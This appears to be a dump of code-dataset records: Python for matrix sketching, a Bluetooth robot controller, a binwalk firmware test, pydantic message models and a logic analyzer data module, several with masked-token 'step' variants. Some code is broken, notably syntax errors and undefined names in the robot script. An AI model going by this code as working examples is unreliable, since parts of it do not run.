k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. 
Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-5": "# coding=utf-8\n# Copyright 2019 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Common methods shared by MNIST and ImageNet experiments.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport errno\nimport getpass\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n# mkdir -p in Python >2.5\ndef mkdir_p(path):\n try:\n os.makedirs(path, mode=0o755)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\n# Returns path to postfix under user's Unix home directory.\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\n# appends .png to file name\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\n# appends .txt to file name\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\n# count parameters for svd truncation\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\n# number of parameters when nrows-by-ncols matrix is approximated\n# with product of nrows-by-rank and rank-by-ncolds matrix.\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\n# Return one random rademacher matrix\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n# Return a rank-1 Rademacher matrix\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n # Plain * is quicker than equivalent np.dot(column_vector, row_vector)\n return column_vector * row_vector\n\n# Sketch matrix A\ndef sketch_matrix(A, 
sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n # Numpy defaults to int64 or float64 (double precision).\n # Computing with float32 (single precision) is quicker.\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO, 'sketch_matrix %s iter %d/%d', 1000,\n sketch_type, i, k)\n # generate random matrix\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n # get coefficient\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n # add coefficient*matrix to A_hat\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return (1.0 / k) * A_hat\n\n\n# Return truncated svd of A, where only the top k components are used.\n# Adding --copt=-mavx --copt=-mavx2 --copt=-mfma compiler flags\n# speeds up svd by almost 2x. However it makes sketching, which is dominant,\n# a tiny bit slower and hence it's not worth it.\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n# num_params is rank for SVD, number of coefficients for sketches.\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print('Error: wrong compression type. Must be svd, our_sketch, or arora.')\n return A_hat\n\n\n# return singular values of A sorted in descending order\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-ids": [ 10, 12, 13, 14, 16 ] }
[ 10, 12, 13, 14, 16 ]
import bluetooth
import serial
import struct

# Definition of Bluetooth rfcomm socket
bd_addr = "98:D3:37:00:8D:39" # The address from the HC-05 sensor
port = 1
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((bd_addr,port))

# Definition of Serial port
ser = serial.Serial("/dev/ttyACM0", 57600)

def BT_DRIVING():
    while True:
        data = ord(sock.recv(1024))
        String = ' '
        String = struct.pack('!B',data)
        ser.write(String)

def BT_SIGNAL():
    while True:
        data = ord(sock.recv(1024))
        String = ' '
        String = struct.pack('!B', data)
        if String == 24:
            return 24
        elif String == 25:
            return 25

def FR30():
    string = 10
    string = struct.pack('!B',string)
    ser.write(string)
def FR15():
    string = 11
    string = struct.pack('!B',string)
    ser.write(string)
def FS00():
    string = 12
    string = struct.pack('!B',string)
    ser.write(string)
def FL15():
    string = 13
    string = struct.pack('!B',string)
    ser.write(string)
def FL30():
    string = 14
    string = struct.pack('!B',string)
    ser.write(string)


def HR30():
    string = 15
    string = struct.pack('!B',string)
    ser.write(string)
def HR15():
    string = 16
    string = struct.pack('!B',string)
    ser.write(string)
def HS00():
    string = 17
    string = struct.pack('!B',string)
    ser.write(string)
def HL15():
    string = 18
    string = struct.pack('!B',string)
    ser.write(string)
def HL30():
    string = 19
    string = struct.pack('!B',string)
    ser.write(string)


def BR30():
    string = 20
    string = struct.pack('!B',string)
    ser.write(string)
def BR15():
    string = 21
    string = struct.pack('!B',string)
    ser.write(string)
def BS00():
    string = 22
    string = struct.pack('!B',string)
    ser.write(string)
def BL15():
    string = 23
    string = struct.pack('!B',string)
    ser.write(string)
def BL30():
    string = 24
    string = struct.pack('!B',string)
    ser.write(string)
normal
{ "blob_id": "605c78795b5a072d330d44a150f26ad410d9d084", "index": 2962, "step-1": "import bluetooth\nimport serial\nimport struct\n\n# Definition of Bluetooth rfcomm socket\nbd_addr = \"98:D3:37:00:8D:39\" # The address from the HC-05 sensor\nport = 1\nsock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\nsock.connect((bd_addr,port))\n\n# Definition of Serial port\nser = serial.Serial(\"/dev/ttyACM0\", 57600)\n\ndef BT_DRIVING():\n while True:\n data = ord(sock.recv(1024))\n String = ' '\n String = struct.pack('!B',data)\n ser.write(string)\n\ndef BT_SIGNAL():\n while True:\n data = ord(sock.recv(1024))\n String = ' '\n String = struct.pack('!B', data)\n if String == 24:\n return 24\n elif String = 25:\n return 25:\n\ndef FR30():\n string = 10\n string = struct.pack('!B',string)\n ser.write(string)\ndef FR15():\n string = 11\n string = struct.pack('!B',string)\n ser.write(string)\ndef FS00():\n string = 12\n string = struct.pack('!B',string)\n ser.write(string)\ndef FL15():\n string = 13\n string = struct.pack('!B',string)\n ser.write(string)\ndef FL30():\n string = 14\n string = struct.pack('!B',string)\n ser.write(string)\n\n\ndef HR30():\n string = 15\n string = struct.pack('!B',string)\n ser.write(string)\ndef HR15():\n string = 16\n string = struct.pack('!B',string)\n ser.write(string)\ndef HS00():\n string = 17\n string = struct.pack('!B',string)\n ser.write(string)\ndef HL15():\n string = 18\n string = struct.pack('!B',string)\n ser.write(string)\ndef HL30():\n string = 19\n string = struct.pack('!B',string)\n ser.write(string)\n\n\ndef BR30():\n string = 20\n string = struct.pack('!B',string)\n ser.write(string)\ndef BR15():\n string = 21\n string = struct.pack('!B',string)\n ser.write(string)\ndef BS00():\n string = 22\n string = struct.pack('!B',string)\n ser.write(string)\ndef BL15():\n string = 23\n string = struct.pack('!B',string)\n ser.write(string)\ndef BL30():\n string = 24\n string = struct.pack('!B',string)\n ser.write(string)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from os.path import dirname

import binwalk
from nose.tools import eq_, ok_


def test_firmware_squashfs():
    '''
    Test: Open hello-world.srec, scan for signatures
        verify that only one signature is returned
        verify that the only signature returned is Motorola S-rec data-signature
    '''
    expected_results = [
        [0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'],
        [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],
        [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],
        [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],
    ]

    scan_result = binwalk.scan(
        dirname(__file__) + '/input-vectors/firmware.squashfs',
        signature=True,
        quiet=True,
        extract=True)  # Throws a warning for missing external extractor
    # Test number of modules used
    eq_(len(scan_result), 1)
    # Test number of results for that module
    eq_(len(scan_result[0].results), len(expected_results))
    # Test result-description
    for i in range(0, len(scan_result[0].results)):
        eq_(scan_result[0].results[i].offset, expected_results[i][0])
        eq_(scan_result[0].results[i].description, expected_results[i][1])
normal
{ "blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d", "index": 5828, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test 
number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import typing from pydantic import AnyUrl from .base import FBObject class MediaPayload(FBObject): url: AnyUrl class Coors(FBObject): lat: float long: float class LocationPayload(FBObject): coordinates: Coors class AttachmentFallback(FBObject): title: str url: AnyUrl payload: typing.Any = None type: str = 'fallback' class Attachment(FBObject): type: str # template, audio, fallback, file, image, location or video payload: typing.Union[MediaPayload, Coors, None]
normal
{ "blob_id": "1f6176e9285d810934ae745cf8759b5cd6f408c8", "index": 8767, "step-1": "<mask token>\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-2": "<mask token>\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-3": "<mask token>\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-4": "import typing\nfrom pydantic import AnyUrl\nfrom .base import FBObject\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-5": "import typing\n\nfrom pydantic import AnyUrl\n\nfrom .base import FBObject\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str # template, audio, fallback, file, image, location or video\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
""" This file contains the general data storage classes used throughout Logician. """ import csv import json import os from collections import OrderedDict VALID_CHANNEL_COUNTS = [4] class Acquisition: """ The acqusition object contains data from all of the acquired channels. Parameters ---------- data : array or bytes or str Array of form [[1, 0, 0, ...], [0, 0, 1, ...], ...] or bytes of data. If data is bytes, channel_count must be provided. samplerate : int The acquisition rate in Samples / sec. """ def __init__(self, data, sample_rate=1, channel_count=None): if isinstance(data, list): if len(data) not in VALID_CHANNEL_COUNTS: raise ValueError('data must have length %s' % str(VALID_CHANNEL_COUNTS)) l = len(data[0]) for channel in data: if len(channel) != l: raise ValueError('All channels must be have same length.') self.data = data elif isinstance(data, bytes): if channel_count not in VALID_CHANNEL_COUNTS: raise ValueError('Invalid number of channels.') # Convert byte string to list of 1's and 0's. If there are 4 # channels each byte should have 2 4 channel samples in it. The MSB # is the 4th channel of the least recent sample. sep_channel_data = [f(c) for c in data for f in (lambda x: ord(x) >> 4, lambda x: ord(x) & 0x0F)] unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))] for d in sep_channel_data] self.data = list(zip(*unpacked_data)) self.data.reverse() elif isinstance(data, str): self.load_csv_file(data) return else: raise TypeError('Invalid data type') self.sample_rate = sample_rate @property def dt(self): return 1.0 / self.sample_rate @property def acquisition_length(self): return len(self.data[0]) @property def channel_count(self): return len(self.data) def csv_string(self): out_string = '#sample_rate=%d' % self.sample_rate for row in zip(*self.data): out_string += str(row)[1:-1].replace(' ', '') out_string += '\n' return out_string def load_csv_file(self, fname): with open(fname) as f: reader = csv.reader(f) header = next(reader) sample_rate = int(header[0].split('=')[-1]) data = [[int(d) for d in row] for row in reader if len(row) != 1] self.data = list(zip(*data)) self.sample_rate = sample_rate def __len__(self): return len(self.data) def __getitem__(self, key): return self.data[key] def __iter__(self): return iter(self.data) class AnalyzerCommand: """ Simple class to hold analyzer commands and create appropriate command bytes to be sent to the firmware. """ sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K', 50000), ('10K', 10000), ('2K', 2000))) sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000), ('200 KS/s', 200000), ('100 KS/s', 10000))) def __init__(self, sample_rate=1e6, sample_count=64000, trigger_type=0, trigger_channel=0): sp = int(1.0 / sample_rate / 1e-6) self.sample_count = sample_count self.sample_rate = sample_rate sample_count /= 1000 self.command_bytes = \ [0x01, # Command (sp & 0x00FF), (sp >> 8), # Sample Period (us) (sample_count & 0x00FF), (sample_count >> 8), trigger_type, trigger_channel] self.command_bytes = (''.join([chr(x) for x in self.command_bytes]) + ' '*(64 - len(self.command_bytes))) class ThemeManager: """ A class to manage and load themes for the signal display. 
""" def __init__(self, theme_dir): self.theme_dir = theme_dir self.refresh() def refresh(self): self.themes = [] for fname in os.listdir(self.theme_dir): if fname.endswith('.json'): try: j = json.loads( open(os.path.join(self.theme_dir, fname)).read()) self.themes.append(j) except: continue def theme_names(self): """ Returns the names for each theme. """ return [theme.get('name', 'Error') for theme in self.themes] def theme_named(self, name): """ Returns the theme named name. Paramters --------- name : str The name of the theme to return. Returns ------- Returns the theme as a dict, or an empty dict if theme could not be found. """ for theme in self.themes: if theme.get('name', 'Error') == name: return theme
normal
{ "blob_id": "ec44e12624fbee3148cfa4f886e86ba437e920ec", "index": 4158, "step-1": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n <mask token>\n <mask token>\n\n def __getitem__(self, key):\n return self.data[key]\n <mask token>\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-2": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n <mask token>\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n <mask token>\n <mask token>\n\n def __getitem__(self, key):\n return self.data[key]\n <mask token>\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = 
''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-3": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if 
theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-4": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n\n def __init__(self, data, sample_rate=1, channel_count=None):\n if isinstance(data, list):\n if len(data) not in VALID_CHANNEL_COUNTS:\n raise ValueError('data must have length %s' % str(\n VALID_CHANNEL_COUNTS))\n l = len(data[0])\n for channel in data:\n if len(channel) != l:\n raise ValueError('All channels must be have same length.')\n self.data = data\n elif isinstance(data, bytes):\n if channel_count not in VALID_CHANNEL_COUNTS:\n raise ValueError('Invalid number of channels.')\n sep_channel_data = [f(c) for c in data for f in (lambda x: ord(\n x) >> 4, lambda x: ord(x) & 15)]\n unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))] for\n d in sep_channel_data]\n self.data = list(zip(*unpacked_data))\n self.data.reverse()\n elif isinstance(data, str):\n self.load_csv_file(data)\n return\n else:\n raise TypeError('Invalid data type')\n self.sample_rate = sample_rate\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 